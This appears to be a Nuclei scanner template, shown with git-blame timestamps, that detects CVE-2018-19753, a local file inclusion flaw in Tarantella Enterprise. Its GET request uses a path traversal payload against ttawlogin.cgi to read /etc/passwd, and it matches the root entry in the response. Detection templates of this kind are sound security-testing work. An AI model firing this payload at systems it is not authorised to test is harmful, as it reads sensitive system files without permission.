2021-12-01 02:20:05 +00:00
|
|
|
id: CVE-2018-19753
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-12-01 02:20:05 +00:00
|
|
|
info:
|
2022-06-13 19:29:02 +00:00
|
|
|
name: Tarantella Enterprise <3.11 - Local File Inclusion
|
2021-12-01 02:20:05 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-06-20 16:21:22 +00:00
|
|
|
description: |
|
|
|
|
Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.
|
2021-12-01 02:20:05 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
|
2022-06-13 19:29:02 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19753
|
2022-06-20 17:58:28 +00:00
|
|
|
- http://seclists.org/fulldisclosure/2018/Nov/66
|
|
|
|
- http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
|
2021-12-01 02:20:05 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2018-19753
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: packetstorm,seclists,cve,cve2018,tarantella,lfi
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-12-01 02:20:05 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-12-01 02:20:05 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|